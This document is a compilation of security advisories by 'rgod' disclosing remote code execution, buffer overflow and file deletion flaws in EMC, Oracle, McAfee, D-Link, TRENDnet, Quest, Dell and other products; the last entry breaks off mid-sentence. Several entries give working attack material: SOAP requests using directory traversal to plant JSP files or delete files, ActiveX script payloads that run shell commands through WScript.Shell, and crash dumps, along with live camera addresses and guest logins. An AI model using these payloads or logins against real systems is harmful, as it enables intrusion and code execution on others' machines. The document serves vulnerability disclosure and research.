EMC Data Protection Advisor DPA Illuminator EJBInvokerServlet Remote Code Execution
EMC Data Protection Advisor DPA Illuminator EJBInvokerServlet Remote Code Execution tested against: Microsoft Windows Server 2008 r2 sp1 EMC Data Protection Advisor 5.8 sp5 vulnerability: the DPA Illuminator service (DPA_Illuminator.exe) listening on public port 8090 (tcp/http) and 8453 (tcp/https) is vulnerable. It exposes the following servlet: http://[host]:8090/invoker/EJBInvokerServlet https://[host]:8453//invoker/EJBInvokerServlet due to a bundled invoker.war The result is remote code execution with NT AUTHORITY\SYSTEM privileges. proof of concept url: http://retrogod.altervista.org/9sg_ejb.html ~rgod~
Symantec Workspace Streaming 7.5.0.493 SWS Streamlet Engine Invoker Servlets Remote Code Execution
Symantec Workspace Streaming 7.5.0.493 SWS Streamlet Engine Invoker Servlets Remote Code Execution tested against: Microsoft Windows Server 2008 R2 sp1 download url: http://www.symantec.com/it/it/products-solutions/trialware/ file tested: Symantec_Workspace_Streaming_7.5.0.493.zip vulnerability: the SWS Streamlet Engine service (as_ste.exe) listening on public port 9832 (tcp/http) is vulnerable. It exposes the following servlet http://[host]:9832/invoker/EJBInvokerServlet http://[host]:9832/invoker/JMXInvokerServlet due to a bundled invoker.sar The result is remote code execution with NT AUTHORITY\SYSTEM privileges. proof of concept url: http://retrogod.altervista.org/9sg_ejb.html ~rgod~
Borland Caliber 11.0 Quiksoft EasyMail SMTP Object Buffer Overflows
Borland Caliber 11.0 Quiksoft EasyMail SMTP Object Buffer Overflows ActiveX settings: Binary path: C:\Program Files (x86)\Borland\CaliberRM\emsmtp.dll Version: 5.0.0.11 ProgID: EasyMail.SMTP.5 CLSID: {4610E7BF-710F-11D3-813D-00C04F6B92D0} Safe for Scripting: True Safe for Initialization: True SubmitToExpress and AddAttachment methods are vulnerable see CVE-2007-4607 and CVE-2009-4663 //rgod
Borland Silk Central 12.1 TeeChart Pro Activex control AddSeries Remote Code Execution
Borland Silk Central 12.1 TeeChart Pro Activex control AddSeries Remote Code Execution ActiveX Settings: Binary path: C:\Program Files\Silk\Shared Files\teechart.ocx CLSID: {008BBE7E-C096-11D0-B4E3-00A0C901D681} ProgID: TeeChart.TChart Version: 4.0.0.7 Safe for Scripting (IObjectSafety): True Safe for Initialization (IObjectSafety): True AddSeries method is vulnerable, see http://www.osvdb.org/show/osvdb/74446 //rgod
Oracle Business Transaction Management Server FlashTunnelService WriteToFile Message Remote Code Execution
Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService WriteToFile Message Remote Code Execution Exploit tested against: Microsoft Windows Server 2003 r2 sp2 Oracle WebLogic Server 12c (12.1.1) Oracle Business Transaction Management Server 12.1.0.2.7 (Production version) files tested: oepe-indigo-installer-12.1.1.0.1.201203120349-12.1.1-win32.exe (weblogic) download url: http://www.oracle.com/technetwork/middleware/weblogic/downloads/index.html BTM_Servers_12.1.0.2.7.zip (BTM, production version) download url: http://www.oracle.com/technetwork/oem/downloads/btw-downloads-207704.html vulnerability: the mentioned product installs a web service called FlashTunnelService which can be reached without prior authentication and processes incoming SOAP requests. It can be reached at the following uri: http://[host]:7001/btmui/soa/flash_svc/ This soap interface exposes the writeToFile function which could allow to write arbitrary files on the target server. Example packet: POST /btmui/soa/flash_svc/ HTTP/1.1 Accept-Encoding: gzip,deflate Content-Type: text/xml;charset=UTF-8 SOAPAction: http://soa.amberpoint.com/writeToFile; User-Agent: Jakarta Commons-HttpClient/3.1 Host: 192.168.0.1:7001 Content-Length: [length] soapenv:Envelope xmlns:soapenv=http://schemas.xmlsoap.org/soap/envelope/; xmlns:int=http://schemas.amberpoint.com/flashtunnel/interfaces; xmlns:typ=http://schemas.amberpoint.com/flashtunnel/types; soapenv:Header/ soapenv:Body int:writeToFileRequest int:writeToFile handle=..\..\..\..\..\..\..\..\[path]\somefile.jsp !--Zero or more repetitions:-- typ:text[code]/typ:text !--Optional:-- typ:WriteToFileRequestVersion !--You may enter ANY elements at this point-- /typ:WriteToFileRequestVersion /int:writeToFile /int:writeToFileRequest /soapenv:Body /soapenv:Envelope the 'handle' property can be used to control the location of the newly written file (it suffers of a directory traversal ulnerability). File extension can also be controlled. File content can be controlled through the 'text' element (note that one must convert the code to html entities firstly, the soap interface will reconvert it to his original format). Given this, a remote attacker, could place an arbitrary jsp script inside the main web server root path, then execute arbitrary code with the privileges of the weblogic installation, usually Administrator privileges). vulnerable code, see the decompiled com.amberpoint.flashtunnel.impl.FlashTunnelServiceImpl.class .. public IWriteToFileResponse writeToFile(IWriteToFileRequest request) throws SOAPFaultException { WriteToFileResponse wtfr = new WriteToFileResponse(); String handle = request.getHandle(); TypedList text = request.getText(); if(text != null text.size() 0) { File f = getFileFromHandle(handle); if(f != null) try { FileOutputStream fos = new FileOutputStream(f); OutputStreamWriter osw = new OutputStreamWriter(fos, UTF-8); int i = 0; for(int ii = text.size(); i ii; i++) { String s = (String)text.get(i); osw.write(s); osw.write(\n); } osw.close(); } catch(IOException ex) { logger.log(Level.SEVERE, (new StringBuilder()).append(IOException writing ').append(f.toString()).append(': ).append(ex.getMessage()).toString()); } } return wtfr; } .. As attachment, proof of concept code written in php, launch from the command line, modify for your own use. poc: http://retrogod.altervista.org/9sg_ora.htm rgod
Oracle Business Transaction Management Server FlashTunnelService Remote File Deletion
Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService Remote File Deletion tested against: Microsoft Windows Server 2003 r2 sp2 Oracle WebLogic Server 12c (12.1.1) Oracle Business Transaction Management Server 12.1.0.2.7 (Production version) files tested: oepe-indigo-installer-12.1.1.0.1.201203120349-12.1.1-win32.exe (weblogic) download url: http://www.oracle.com/technetwork/middleware/weblogic/downloads/index.html BTM_Servers_12.1.0.2.7.zip (BTM, production version) download url: http://www.oracle.com/technetwork/oem/downloads/btw-downloads-207704.html vulnerability: the mentioned product installs a web service called FlashTunnelService which can be reached without prior authentication and processes incoming SOAP requests. It can be reached at the following uri: http://[host]:7001/btmui/soa/flash_svc/ This soap interface exposes the 'deleteFile' function which could allow to delete arbitrary files with administrative privileges on the target server through a directory traversal vulnerability. This could be useful for further attacks. Example packet: POST /btmui/soa/flash_svc/ HTTP/1.1 Accept-Encoding: gzip,deflate Content-Type: text/xml;charset=UTF-8 SOAPAction: http://soa.amberpoint.com/deleteFile; User-Agent: Jakarta Commons-HttpClient/3.1 Host: [host]:7001 Content-Length: [length] soapenv:Envelope xmlns:soapenv=http://schemas.xmlsoap.org/soap/envelope/; xmlns:int=http://schemas.amberpoint.com/flashtunnel/interfaces; xmlns:typ=http://schemas.amberpoint.com/flashtunnel/types; soapenv:Header/ soapenv:Body int:deleteFileRequest int:deleteFile handle=../../../../../../../../../../../../somepath/somefile.ext typ:DeleteFileRequestVersion /typ:DeleteFileRequestVersion /int:deleteFile /int:deleteFileRequest /soapenv:Body /soapenv:Envelope Vulnerable code, see the decompiled com.amberpoint.flashtunnel.impl.FlashTunnelServiceImpl class: .. public IDeleteFileResponse deleteFile(IDeleteFileRequest request) throws SOAPFaultException { DeleteFileResponse dfr = new DeleteFileResponse(); String handle = request.getHandle(); File f = getFileFromHandle(handle); if(f != null) f.delete(); return dfr; } .. As attachment, proof of concept code. poc: http://retrogod.altervista.org/9sg_ora2.htm rgod
AOL Products downloadUpdater2 Plugin SRC Parameter Remote Code Execution
AOL Products downloadUpdater2 Plugin SRC Parameter Remote Code Execution tested against: Microsoft Windows Vista sp2 Microsoft Windows Server 2003 r2 sp2 Mozilla Firefox 14.0.1 download url: http://client.web.aol.com/toolbarfiles/Prod/downloads/downloadupdater/dnupdatersetup.exe (this was the update for a previous vulnerability, see ZDI-12-098) see also the installer aol_toolbar_pricecheck.exe url: http://toolbar.aol.com/download_files/download-helper.html?brand=aola=111ncid=txtlnkusdown0043 vulnerability: the mentioned product installs a Firefox plugin: File: npdnupdater2.dll Version: 1.3.0.0 Name: npdnupdater2 Path: C:\Program Files\Mozilla Firefox\plugins\npdnupdater2.dll Mime type: applicatiotn/x-vend.aol.dnupdater2.1 Extension: ocp By embedding this plugin inside an html page is possible to trigger a buffer overflow vulnerability through the 'SRC' parameter. Example crash: EAX ECX 01101470 EDX 01135208 ASCII EBX ESP 0013F618 EBP 0013F634 ESI 0002 EDI 0013F668 EIP 61616161 C 1 ES 0023 32bit 0() P 1 CS 001B 32bit 0() A 1 SS 0023 32bit 0() Z 0 DS 0023 32bit 0() S 1 FS 003B 32bit 7FFDD000(4000) T 0 GS NULL D 0 O 0 LastErr ERROR_SUCCESS EFL 0297 (NO,B,NE,BE,S,PE,L,LE) ST0 empty 0.0 ST1 empty 0.0 ST2 empty 0.0 ST3 empty 0.0 ST4 empty 0.0 ST5 empty 0.0 ST6 empty 8.000 ST7 empty 0.250 CONST 1/4. 3 2 1 0 E S P U O Z D I FST 0120 Cond 0 0 0 1 Err 0 0 1 0 0 0 0 0 (LT) FCW 027F Prec NEAR,53 Mask1 1 1 1 1 1 Last cmnd 001B:10571FBD xul.10571FBD XMM0 XMM1 61616161 61616161 61616161 61616161 XMM2 61616161 61616161 61616161 61616161 XMM3 61616161 61616161 61616161 61616161 XMM4 61616161 61616161 61616161 61616161 XMM5 61616161 61616161 61616161 61616161 XMM6 61616161 61616161 61616161 61616161 XMM7 61616161 61616161 61616161 61616161 P U O Z D I MXCSR 1F80 FZ 0 DZ 0 Err 0 0 0 0 0 0 Rnd NEAR Mask 1 1 1 1 1 1 EIP is overwritten, also EDX points to user-supplied code (this can be done by setting an overlong fake parameter, see poc). As attachment, proof of concept code. a copy loop [*] is involved in overwriting a certain memory region. The subsequent code can be used to call inside this memory region [**]. See npdnupdater2.dll: CPU Disasm Address Hex dump Command Comments 01A91C10 /$ 55PUSH EBP ; npdnupdater2.01A91C10(guessed Arg1) 01A91C11 |. 56PUSH ESI 01A91C12 |. 8BE9 MOV EBP,ECX 01A91C14 |. 57PUSH EDI 01A91C15 |. 8B7C24 10 MOV EDI,DWORD PTR SS:[ARG.1] 01A91C19 |. C745 00 9CA2A MOV DWORD PTR SS:[EBP],OFFSET 01A9A29C 01A91C20 |. 8B07 MOV EAX,DWORD PTR DS:[EDI] 01A91C22 |. 33F6 XOR ESI,ESI 01A91C24 |. 8945 04 MOV DWORD PTR SS:[EBP+4],EAX 01A91C27 |. C645 08 00MOV BYTE PTR SS:[EBP+8],0 01A91C2B |. C745 10 0 MOV DWORD PTR SS:[EBP+10],0 01A91C32 |. 66:3977 0ACMP WORD PTR DS:[EDI+0A],SI 01A91C36 |. 7E 3E JLE SHORT 01A91C76 01A91C38 |. EB 06 JMP SHORT 01A91C40 01A91C3A | 8D9B LEA EBX,[EBX] 01A91C40 | 8B4F 0C /MOV ECX,DWORD PTR DS:[EDI+0C] 01A91C43 |. 8B14B1|MOV EDX,DWORD PTR DS:[ESI*4+ECX] 01A91C46 |. 68 D4A2A901 |PUSH OFFSET 01A9A2D4; /Arg2 = ASCII SRC 01A91C4B |. 52|PUSH EDX; |Arg1 01A91C4C |. E8 E06F |CALL 01A98C31- ; \npdnupdater2.01A98C31 01A91C51 |. 83C4 08 |ADD ESP,8 01A91C54 |. 85C0 |TEST EAX,EAX 01A91C56 |. 75 15 |JNE SHORT 01A91C6D 01A91C58 |. 8B47 10 |MOV EAX,DWORD PTR DS:[EDI+10] 01A91C5B |. 8B0CB0|MOV ECX,DWORD PTR DS:[ESI*4+EAX] 01A91C5E |. BA 38CCA901 |MOV EDX,OFFSET 01A9CC38 ; ASCII ... 01A91C63 | 8A01 |/MOV AL,BYTE PTR DS:[ECX] - [*] 01A91C65 |. 41||INC ECX 01A91C66 |. 8802 ||MOV BYTE PTR DS:[EDX],AL 01A91C68 |. 42||INC EDX 01A91C69 |. 84C0 ||TEST AL,AL 01A91C6B |.^ 75 F6 |\JNE SHORT 01A91C63 01A91C6D | 0FBF4F 0A |MOVSX ECX,WORD PTR DS:[EDI+0A] 01A91C71 |. 46|INC ESI 01A91C72 |. 3BF1 |CMP ESI,ECX 01A91C74 |.^ 7C CA \JL SHORT 01A91C40 01A91C76 | 5FPOP EDI 01A91C77 |. 5EPOP ESI 01A91C78 |. 8BC5 MOV EAX,EBP 01A91C7A |. 5DPOP EBP 01A91C7B \. C2 0400 RETN 4 01A91C7E CCINT3
Adobe Photoshop CS5.1 U3D.8BI Library Collada Asset Elements Stack Based Buffer Overflow Vulnerability
Adobe Photoshop CS5.1 U3D.8BI Library Collada Asset Elements Stack Based Buffer Overflow Vulnerability download url of a test version: http://www.adobe.com/cfusion/tdrc/index.cfm?product=photoshop Note: Found three weeks before the CS6 release. I could not reproduce against CS6, cannot say if there is a CVE for this, I think is also possible they patched silently. However this leaves a lot of Photoshop installations vulnerable. vulnerability: A buffer overflow exists in the way Photoshop parses Collada (*.DAE) asset elements, example file: .. ?xml version=1.0? COLLADA xmlns=http://www.collada.org/2005/11/COLLADASchema; version=1.4.1 asset contributor authorrgod/author authoring_toolMaya 8.0 | ColladaMaya v3.02 | FCollada v3.2/authoring_tool commentsCollada Maya Export Options: bakeTransforms=0;exportPolygonMeshes=1;bakeLighting=0;isSampling=0; curveConstrainSampling=0;exportCameraAsLookat=0; exportLights=1;exportCameras=1;exportJointsAndSkin=1; exportAnimations=1;exportTriangles=1;exportInvisibleNodes=0; exportNormals=1;exportTexCoords=1;exportVertexColors=1;exportTangents=0; exportTexTangents=0;exportConstraints=1;exportPhysics=0;exportXRefs=1; dereferenceXRefs=0;cameraXFov=0;cameraYFov=1... /comments .. While trying to convert the element field from ASCII to Unicode the U3D.B8I library plugin does a miscalculation in allocating a buffer for the user-supplied string then overwrite the stack with the user-controlled buffer. Critical structures are overwritten (SEH), also the arguments of a subsequent memcpy() are used-controlled. vulnerable code, theese routines u3d.8bi (this is repeated one time for each byte of the string), run trace: .. 10A05C30 55 pushebp 10A05C31 8BEC mov ebp, esp 10A05C33 83EC 10 sub esp, 10 10A05C36 8B45 08 mov eax, dword ptr ss:[ebp+8] 10A05C39 0345 0C add eax, dword ptr ss:[ebp+C] 10A05C3C 8945 F8 mov dword ptr ss:[ebp-8], eax 10A05C3F 8B4D 0C mov ecx, dword ptr ss:[ebp+C] 10A05C42 894D F4 mov dword ptr ss:[ebp-C], ecx 10A05C45 8B55 F4 mov edx, dword ptr ss:[ebp-C] 10A05C48 83EA 01 sub edx, 1 10A05C4B 8955 F4 mov dword ptr ss:[ebp-C], edx 10A05C4E 837D F4 03 cmp dword ptr ss:[ebp-C], 3 10A05C52 77 0Aja short U3D.10A05C5E 10A05C54 8B45 F4 mov eax, dword ptr ss:[ebp-C] 10A05C57 FF2485 A45DA010 jmp dword ptr ds:[eax*4+10A05DA4] .. .. 10A05D6A 8B4D 08 mov ecx, dword ptr ss:[ebp+8] 10A05D6D 0FB611 movzx edx, byte ptr ds:[ecx] 10A05D70 81FA 8000cmp edx, 80 10A05D76 7C 12jl short U3D.10A05D8A 10A05D78 8B45 08 mov eax, dword ptr ss:[ebp+8] 10A05D7B 0FB608 movzx ecx, byte ptr ds:[eax] 10A05D7E 81F9 C200cmp ecx, 0C2 10A05D84 7D 04jge short U3D.10A05D8A 10A05D86 32C0 xor al, al 10A05D88 EB 13jmp short U3D.10A05D9D 10A05D8A 8B55 08 mov edx, dword ptr ss:[ebp+8] 10A05D8D 0FB602 movzx eax, byte ptr ds:[edx] 10A05D90 3D F400 cmp eax, 0F4 10A05D95 7E 04jle short U3D.10A05D9B 10A05D97 32C0 xor al, al 10A05D99 EB 02jmp short U3D.10A05D9D 10A05D9B B0 01mov al, 1 10A05D9D 8BE5 mov esp, ebp 10A05D9F 5D pop ebp 10A05DA0 C3 retn .. .. 10A05E4B 83C4 08 add esp, 8 10A05E4E 0FB6D0 movzx edx, al 10A05E51 85D2 testedx, edx 10A05E53 75 0Cjnz short U3D.10A05E61 10A05E55 C745 F8 0300 mov dword ptr ss:[ebp-8], 3 10A05E5C E9 1502 jmp U3D.10A06076 10A05E61 0FB745 F0movzx eax, word ptr ss:[ebp-10] 10A05E65 8945 E8 mov dword ptr ss:[ebp-18], eax 10A05E68 837D E8 05 cmp dword ptr ss:[ebp-18], 5 10A05E6C 0F87 B500ja U3D.10A05F27 10A05E72 8B4D E8 mov ecx, dword ptr ss:[ebp-18] 10A05E75 FF248D 9060A010 jmp dword ptr ds:[ecx*4+10A06090] .. .. 10A05F12 8B4D F4 mov ecx, dword ptr ss:[ebp-C] 10A05F15 0FB611 movzx edx, byte ptr ds:[ecx] 10A05F18 0355 EC add edx, dword ptr ss:[ebp-14] 10A05F1B 8955 EC mov dword ptr ss:[ebp-14], edx 10A05F1E 8B45 F4 mov eax, dword ptr ss:[ebp-C] 10A05F21 83C0 01 add eax, 1 10A05F24 8945 F4 mov dword ptr ss:[ebp-C], eax 10A05F27 0FB74D F0movzx ecx, word ptr ss:[ebp-10] 10A05F2B 8B55 EC mov edx, dword ptr ss:[ebp-14] 10A05F2E 2B148D 5034B110 sub edx, dword ptr ds:[ecx*4+10B1345 10A05F35 8955 EC mov
McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 ActiveX Control GetObject() Security Bypass Remote Code Execution Vulnerability
McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 ActiveX Control GetObject() Security Bypass Remote Code Execution Vulnerability tested against: Microsoft Windows Vista sp2 Microsoft Windows 2003 r2 sp2 Internet Explorer 7/8/9 product homepage: http://www.mcafee.com/it/downloads/free-tools/virtual-technician.aspx file tested: MVTInstaller.exe background: the mentioned product installs an ActiveX control with the following settings: Binary path: C:\Program Files\McAfee\Supportability\MVT\MVT.dll ProgID: MVT.MVTControl.6300 CLSID: {2EBE1406-BE0E-44E6-AE10-247A0C5AEDCF} Implements IObjectSafety: Yes Safe for Scripting (IObjectSafety): true Safe for Initialization (IObjectSafety: false According to IObjectSafety interface, this control is safe for scripting, then Internet Explorer will allow scripting from remote. Vulnerability: this control offers the vulnerable GetObject() function, see typelib: .. /* DISPID=3 */ /* VT_VARIANT [12] */ function GetObject( /* VT_VARIANT [12] [in] */ $in_dwObjectID ) { /* method GetObject */ } .. by specifing the ProgID of an arbitrary class from the underlying operating system, with no regards for browser security, is possible to load ex. the WScript.Shell class. The returned object now offers the Exec() method which can be used to launch operating system commands. Example of attack: object classid='clsid:2EBE1406-BE0E-44E6-AE10-247A0C5AEDCF' id='obj' / /object script defer=defer var x = obj.GetObject(WScript.Shell); x.Exec(cmd /c start calc); /script it is also possible to crash the browser by specifying an arbitrary memory address object classid='clsid:2EBE1406-BE0E-44E6-AE10-247A0C5AEDCF' id='obj' / /object script defer=defer var x = obj.GetObject(0x0c0c0c0c); /script example crash: eax=0c0c0c0c ebx=0197085c ecx=01b5efec edx=008e esi=01b5efec edi=01b5f344 eip=77bd8efa esp=01b5ef80 ebp=01b5ef80 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010206 msvcrt!wcslen+0x8: 77bd8efa 668b08 mov cx,word ptr [eax]ds:0023:0c0c0c0c= debugger shows an access violation while reading 0x0c0c0c0c, this could be also exploitable but not demonstrated at the time of this report As attachment, proof of concept code which executes calc.exe, then crash IE. additional note: 0:010 lm -vm mvt startendmodule name 0345 034b8000 MVT(deferred) Image path: D:\Program Files\McAfee\Supportability\MVT\MVT.dll Image name: MVT.dll Timestamp:Thu Jan 12 07:37:26 2012 (4F0E7FA6) CheckSum: 0006C308 ImageSize:00068000 File version: 6.3.0.1911 Product version: 6.3.0.1911 File flags: 0 (Mask 3F) File OS: 4 Unknown Win32 File type:2.0 Dll File date:. Translations: 0409.04e4 CompanyName: McAfee, Inc. ProductName: McAfee Virtual Technician InternalName: MVT.dll OriginalFilename: MVT.dll ProductVersion: 6.3.0.1911 FileVersion: 6.3.0.1911 FileDescription: McAfee, Inc. LegalCopyright: ©2011 McAfee, Inc. All Rights Reserved. //rgod original url: http://retrogod.altervista.org/9sg_mcafee_vt_adv.htm poc: http://retrogod.altervista.org/9sg_mcafee_vt_ax.htm
TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow
TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow camera demo http://67.203.184.58:9193/admin/view.cgi?profile=0 username=guest password=guest Background: The mentioned product, when browsing the device web interface, asks to install an ActiveX control to stream video content. It has the following settings: File version: 1, 1, 52, 18 Product name: UltraMJCam device ActiveX Control Binary path: C:\WINDOWS\Downloaded Program Files\UltraMJCamX.ocx ProgID: UltraMJCam.UltraMJCam.1 CLSID: {707ABFC2-1D27-4a10-A6E4-6BE6BDF9FB11} Implements IObjectSafety: yes Safe for Scripting (IObjectSafety): True Safe for Initialization (IObjectSafety): True Vulnerability: This ActiveX control exposed the vulnerable OpenFileDlg() method, see typelib: .. /* DISPID=101 */ /* VT_BSTR [8] */ function OpenFileDlg( /* VT_BSTR [8] [in] */ $sFilter ) { /* method OpenFileDlg */ } .. By invoking this method with an overlong argument is possible to overflow a buffer. This is because of an insecure WideCharToMultiByte() call inside UltraMJCamX.ocx: Call stack of main thread AddressStack Procedure / arguments Called from Frame 001279FC 77E6F20B kernel32.77E637DE kernel32.77E6F206 00127A0C 00127A10 0299F958 kernel32.WideCharToMultiByte UltraMJC.0299F952 00127A0C 00127A14 0003 CodePage = 3 00127A18 Options = 0 00127A1C 03835C5C WideCharStr = 00127A20 WideCharCount = (-1.) 00127A24 00127A50 MultiByteStr = 00127A50 00127A28 7532 MultiByteCount = 7532 (30002.) 00127A2C pDefaultChar = NULL 00127A30 pDefaultCharUsed = NULL 00127A3C 029B11D0 UltraMJC.0299F920 UltraMJC.029B11CB 00127A38 .. 0299F934 8B45 08 mov eax,dword ptr ss:[ebp+8] 0299F937 C600 00 mov byte ptr ds:[eax],0 0299F93A 6A 00push 0 0299F93C 6A 00push 0 0299F93E 8B4D 10 mov ecx,dword ptr ss:[ebp+10] 0299F941 51 push ecx 0299F942 8B55 08 mov edx,dword ptr ss:[ebp+8] 0299F945 52 push edx 0299F946 6A FFpush -1 0299F948 8B45 0C mov eax,dword ptr ss:[ebp+C] 0299F94B 50 push eax 0299F94C 6A 00push 0 0299F94E 8B4D 14 mov ecx,dword ptr ss:[ebp+14] 0299F951 51 push ecx 0299F952 FF15 20319F02call dword ptr ds:[KERNEL32.WideCharTo; kernel32.WideCharToMultiByte .. The result is that critical structures are overwritten (SEH) allowing to execute arbitrary code against the target browser. As attachment, basic proof of concept code. original url: http://retrogod.altervista.org/9sg_trendnet_adv.htm poc: http://retrogod.altervista.org/9sg_trendnet_poc.htm
Quest InTrust 10.4.x Annotation Objects ActiveX Control AnnotateX.dll Uninitialized Pointer Remote Code Execution
Quest InTrust 10.4.x Annotation Objects ActiveX Control AnnotateX.dll Uninitialized Pointer Remote Code Execution homepage: http://www.quest.com/intrust/ description: InTrust securely collects, stores, reports and alerts on event log data from Windows, Unix and Linux systems, helping you comply with external regulations, internal policies and security best practices. download url of a test version: http://www.quest.com/downloads/ file tested: Quest_InTrust---Full-Package_104.zip Background: The mentioned product installs an ActiveX control with the following settings: binary path: C:\PROGRA~1\COMMON~1\SOFTWA~1\ANNOTA~1.DLL CLSID: {EF600D71-358F-11D1-8FD4-00AA00BD091C} ProgID: AnnotationX.AnnList.1 Implements IObjectSafety: Yes Safe for Scripting (IObjectSafety): True Safe for Initialization (IObjectSafety): True According to the IObjectSafety interface it is safe for scripting and safe for initialization, so Internet Explorer will allow scripting of this control from remote. Vulnerability: By invoking the Add() method is possible to call inside a memory region of choice set by the attacker through ex. heap spray or other tecniques. Example code: object classid='clsid:EF600D71-358F-11D1-8FD4-00AA00BD091C' id='obj' / /object script obj.Add(0x76767676,1); /script .. eax=76767676 ebx=4401e51c ecx=01f85340 edx= esi=01f85340 edi=0001 eip=4400ae62 esp=015fd134 ebp=015fd140 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010202 ANNOTA_1+0xae62: 4400ae62 ff1485504a0244 calldword ptr ANNOTA_1!DllUnregisterServer+0x19235 (44024a50)[eax*4] ds:0023:1ddc2428= .. You are in control of eax: fully exploitable. As attachment, proof of concept code. original url: http://retrogod.altervista.org/9sg_quest_adv.htm poc: http://retrogod.altervista.org/9sg_quest_poc.htm
D-Link SecuriCam DCS-5605 Network Surveillance ActiveX Control DcsCliCtrl.dll lstrcpyW Remote Buffer Overflow Vulnerability
D-Link SecuriCam DCS-5605 Network Surveillance ActiveX Control DcsCliCtrl.dll lstrcpyW Remote Buffer Overflow Vulnerability tested against: Microsoft Windows Server 2003 r2 sp2 Internet Explorer 7/8 Live demo: http://203.125.227.70/eng/index.cgi username: dlink password: dlink product homepage: http://www.d-link.com/products/?pid=771 product description: The DCS-5605 is a high performance camera for professional surveillance and remote monitoring. This network camera features motorized pan, tilt, and optical/digital zoom for ultimate versatility. The 10x optical zoom lens delivers the level of detail necessary to identify faces, license plate numbers, and other important details that are difficult to clearly distinguish using digital zoom alone background: When browsing the device web interface, the user is asked to install an ActiveX control to stream video content. This control has the following settings: Description: Camera Stream Client Control File version: 1.0.0.4519 Binary path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll ProgID: DcsCliCtrl.DCSStrmControl.1 GUID: {721700FE-7F0E-49C5-BDED-CA92B7CB1245} Implements IObjectSafety: Yes Safe For Scripting (IObjectSafety): True Safe For Initialization (IObjectSafety): True Vulnerability: the ActiveX control exposes the SelectDirectory() method which supports one optional argument. See typelib: .. /* DISPID=22 */ /* VT_BSTR [8] */ function SelectDirectory( /* VT_VARIANT [12] [in] */ $varDefPath ) { /* method SelectDirectory */ } .. This method suffers of a stack based buffer overflow vulnerability because an unsafe lstrcpyW() call inside DcsCliCtrl.dll: .. 100712E0 81EC 3404sub esp,434 100712E6 A1 2C841010 mov eax,dword ptr ds:[1010842C] 100712EB 33C4 xor eax,esp 100712ED 898424 3004 mov dword ptr ss:[esp+430],eax 100712F4 53 push ebx 100712F5 8B9C24 4804 mov ebx,dword ptr ss:[esp+448] 100712FC 55 push ebp 100712FD 8BAC24 4004 mov ebp,dword ptr ss:[esp+440] 10071304 56 push esi 10071305 8BB424 4C04 mov esi,dword ptr ss:[esp+44C] 1007130C 57 push edi 1007130D 8BBC24 4C04 mov edi,dword ptr ss:[esp+44C] 10071314 68 0802 push 208 10071319 8D4424 34lea eax,dword ptr ss:[esp+34] 1007131D 6A 00push 0 1007131F 50 push eax 10071320 E8 0BC40300 call DcsCliCt.100AD730 10071325 83C4 0C add esp,0C 10071328 85F6 test esi,esi 1007132A 74 0Cje short DcsCliCt.10071338 1007132C 56 push esi 1007132D 8D4C24 34lea ecx,dword ptr ss:[esp+34] 10071331 51 push ecx 10071332 FF15 D4D20C10call dword ptr ds:[KERNEL32.lstrcpyW] ; kernel32.lstrcpyW - .. An attacker could entice a remote user to browse a web page to gain control of the victim browser, by passing an overlong string to the mentioned method and overwriting critical structures (SEH). As attachment proof of concept code. Note, to reproduce the wanted crash: when the SelectDirectory() method is called the user is asked to select a destination folder for the stream recorder. To set EIP to 0x0c0c0c0c select a folder of choice, then proceed. When clicking Cancel you have an unuseful crash, however it could be possible that modifying the poc you will have EIP overwritten aswell. I think that it is also possible that other products might carry this dll, I could post an update if I find more. Additional note: 0:029 lm -vm DcsCliCtrl startendmodule name 0845 0859e000 DcsCliCtrl (deferred) Image path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll Image name: DcsCliCtrl.dll Timestamp:Thu Aug 19 08:48:47 2010 (4C6CD3CF) CheckSum: 001325EC ImageSize:0014E000 File version: 1.0.0.4519 Product version: 1.0.0.1 File flags: 0 (Mask 3F) File OS: 4 Unknown Win32 File type:2.0 Dll File date:. Translations: 0409.04e4 ProductName: Camera Streaming Client InternalName: DcsCliCtrl.dll OriginalFilename: DcsCliCtrl.dll ProductVersion: 1.0.0.1 FileVersion: 1.0.0.4519 FileDescription: Camera Stream Client Control LegalCopyright: Copyright: (c) All rights reserved. original url: http://retrogod.altervista.org/9sg_dlink_adv.htm poc: http://retrogod.altervista.org/9sg_dlink_poc.htm
Dell Webcam Software Bundled ActiveX Control CrazyTalk4Native.dll sprintf Remote Buffer Overflow Vulnerability
Dell Webcam Software Bundled ActiveX Control CrazyTalk4Native.dll sprintf Remote Buffer Overflow Vulnerability Tested against: Microsoft Windows Vista SP2 Microsoft Windows XP SP3 Microsoft Windows 2003 R2 SP2 Internet Explorer 7/8/9 download url of a test version: http://search.dell.com/results.aspx?c=usl=ens=gencat=supk=Dell+SX2210+monitorrpp=12p=1subcat=dydrf=allnk=fsort=Kira=False~srd=Falseipsys=Falseadvsrch=False~ck=anav file tested: Dell_SX2210-Monitor_Webcam SW RC1.1_ R230103.exe This package contains the Dell Webcam Central software developed by Creative Technologies for Dell. info: http://dell-webcam-central.software.informer.com/ http://live-cam-avatar-creator.software.informer.com/ http://www.google.com/search?channel=shl=enbiw=1024bih=581q=13149882-F480-4F6B-8C6A-0764F75B99ED http://www.google.com/search?sclient=psy-abhl=enbiw=1024bih=581source=hpq=crazytalk4.ocxbtnG=Search http://www.google.com/search?sclient=psy-abhl=enbiw=1024bih=581source=hpq=CrazyTalk4Native.dllbtnG=Search http://dell-webcam-central.software.informer.com/users/ http://live-cam-avatar-creator.software.informer.com/users/ I think this is a very common ActiveX, probably bundled with Dell Notebooks. Background: The mentioned software carries a third party ActiveX Control with the following settings. Binary path: C:\Program Files\Common Files\Reallusion\CT Player\crazytalk4.ocx ProgID: CRAZYTALK4.CrazyTalk4Ctrl.1 CLSID: {13149882-F480-4F6B-8C6A-0764F75B99ED} Safe for Scripting (Registry): True Safe for Initialization (Registry): True This control is marked safe 